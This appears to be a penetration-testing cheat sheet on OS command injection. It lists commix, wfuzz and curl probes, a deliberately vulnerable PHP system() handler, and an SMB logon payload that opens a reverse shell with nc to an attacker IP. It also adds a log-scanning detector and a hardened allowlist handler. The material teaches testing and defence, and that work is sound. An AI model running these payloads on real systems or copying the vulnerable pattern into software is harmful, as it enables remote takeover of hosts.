Command Injection – Tools and methods
Below is a list of common tools and methods for testing for command injection.

Commix

```
commix -r /home/workdir/email.req --auth-cred=admin:password --all --batch --level 3
```
wfuzz

```
wfuzz -c -z file,/usr/share/wordlists/fuzzdb/attack/os-cmd-execution/Commands-Linux.txt,base64 -b "PHPSESSID=077dn044qmuh2ut41tksedvlv2" -d "check=FUZZ" http://10.10.10.105/diag.php
```
curl

```
# opt param vulnerable to RCE:
curl -v "http://10.10.10.69/sync?opt=' id'"
```
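The wfuzz and curl probes above leave a recognisable trace in web server request logs: a parameter value that carries shell metacharacters, a quote that breaks out of a quoted argument, or a base64 blob that decodes to a command line. The detector below is an added example, not part of the original page; the log lines it scans are constructed in Apache combined format and the paths, IPs and parameter names are borrowed from the examples above. Note that wfuzz sends `check=FUZZ` in a POST body, which the access log does not record, so that case needs application-level logging or a WAF in front of the host; the sample uses GET so the access log alone can show the point.

```python
"""Flag web requests whose query parameters look like OS command injection.

Added example (not from the original page). SAMPLE_LOG is constructed.
"""
import base64
import binascii
import re
from urllib.parse import parse_qsl, urlsplit

# Strong indicators: command separators, substitution, redirection.
STRONG_META = re.compile(r"[;&|`<>\n]|\$\(|\$\{")
# Weak indicator: a quote can terminate a quoted argument. Noisy for free-text
# fields; suited to parameters that should hold a bare token (host, option name).
QUOTE_BREAKOUT = re.compile(r"""['"]""")
# Loose base64 shape: base64 alphabet, at least 8 chars, optional padding.
B64_SHAPE = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")
# Apache combined log: client ip, ident, user, [time], "METHOD target PROTO" status ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample lines imitating probes against /diag.php and /sync.
SAMPLE_LOG = [
    '10.10.14.17 - - [10/Oct/2018:12:00:01 +0000] "GET /diag.php?check=localhost HTTP/1.1" 200 512',
    '10.10.14.17 - - [10/Oct/2018:12:00:02 +0000] "GET /diag.php?check=aWQ7IHVuYW1lIC1h HTTP/1.1" 200 640',
    '10.10.14.17 - - [10/Oct/2018:12:00:03 +0000] "GET /sync?opt=%27%20id%27 HTTP/1.1" 200 77',
    '10.10.14.17 - - [10/Oct/2018:12:00:04 +0000] "GET /sync?opt=full%3Bid HTTP/1.1" 500 0',
    '10.10.14.18 - - [10/Oct/2018:12:00:05 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048',
]


def decode_b64(value):
    """Return decoded text if value is valid base64 yielding printable ASCII, else None."""
    if not B64_SHAPE.match(value) or len(value) % 4:
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def scan_request_target(target):
    """Return (param, indicator, value) findings for one request target (path + query)."""
    findings = []
    # parse_qsl percent-decodes, so %27%20id%27 is inspected as ' id'.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if STRONG_META.search(value):
            findings.append((name, "shell-metachar", value))
        elif QUOTE_BREAKOUT.search(value):
            findings.append((name, "quote-breakout", value))
        decoded = decode_b64(value)
        if decoded is not None and STRONG_META.search(decoded):
            findings.append((name, "base64-shell-metachar", decoded))
    return findings


def scan_log(lines):
    """Return [(client_ip, target, findings)] for every line with at least one finding."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not in the expected format; a real pipeline would count these
        findings = scan_request_target(m.group("target"))
        if findings:
            hits.append((m.group("ip"), m.group("target"), findings))
    return hits


if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        for param, indicator, value in findings:
            print(f"{ip} {target} -> {param}: {indicator} ({value!r})")
```

Three of the five constructed lines are flagged; the base64 value is only caught because it is decoded and re-checked, which is the case a metacharacter-only rule misses.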
SMB

The following can be used to achieve command execution and pop a reverse shell via a poorly configured SMB share.

```
smbclient //10.10.10.3/tmp
```

On the attacker machine, start the listener first:

```
nc -lnvp 1233
```

Then, from the smbclient prompt, get command execution:

```
logon "/=`nc 10.10.14.17 1233 -e /bin/bash`"
```

smbmap and smbclient also have switches for command execution over SMB.
PHP

A minimal example of the vulnerable pattern the tools above look for: the request parameter is passed straight to the shell.

```php
<?php
$cmd=$_GET['cmd'];
system($cmd);
?>
```
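The fix for the handler above is not to escape the parameter but to keep user input out of the shell altogether: the parameter selects an entry from a fixed allowlist, the target is validated against a strict shape, and the command is built as an argv list so no shell ever parses it. The code below is an added example written in Python rather than PHP (the same structure applies to `escapeshellarg`-free PHP using `proc_open` with an argument array); it is not the page's code, and the check names, `ALLOWED_CHECKS` and the diagnostic-endpoint scenario are assumptions modelled on the `diag.php?check=` parameter above.

```python
"""Hardened counterpart to the one-line vulnerable handler.

Added example (not from the original page). ALLOWED_CHECKS and the endpoint
scenario are assumed; they imitate a diagnostics page with a 'check' parameter.
"""
import ipaddress
import re
import subprocess

# Weak pattern, the equivalent of $_GET['cmd'] -> system($cmd). Kept only for
# contrast; the shell parses whatever the client sent.
def run_diag_weak(cmd):
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout

# Hostname shape (RFC 1123 labels): no spaces, quotes, separators or leading '-',
# so shell metacharacters and argument injection (e.g. a target of "-c") are both rejected.
HOSTNAME = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)

# Allowlist: the client picks a key; the value is fixed argv the client never edits.
ALLOWED_CHECKS = {
    "ping": ["ping", "-c", "1"],
    "resolve": ["getent", "hosts"],
}


def validate_target(target):
    """True if target is an IP address or a plausible hostname, False otherwise."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        pass
    return bool(HOSTNAME.match(target))


def build_argv(check, target):
    """Return the argv list for an allowed check and valid target, or None if rejected."""
    prefix = ALLOWED_CHECKS.get(check)
    if prefix is None or not validate_target(target):
        return None
    return prefix + [target]


def run_diag(check, target):
    """Run an allowed check without a shell; returns its stdout or 'rejected'."""
    argv = build_argv(check, target)
    if argv is None:
        return "rejected"
    # No shell=True: the target is a single argv element, never re-parsed.
    result = subprocess.run(argv, capture_output=True, text=True, timeout=5)
    return result.stdout


if __name__ == "__main__":
    print(run_diag("ping", "127.0.0.1"))
    print(run_diag("ping", "127.0.0.1; id"))  # rejected before anything runs
```

Rejecting at `build_argv` means a probe like the `' id'` or `;id` payloads above never reaches `subprocess.run`; log the rejection with the client address and you have a detection signal for free.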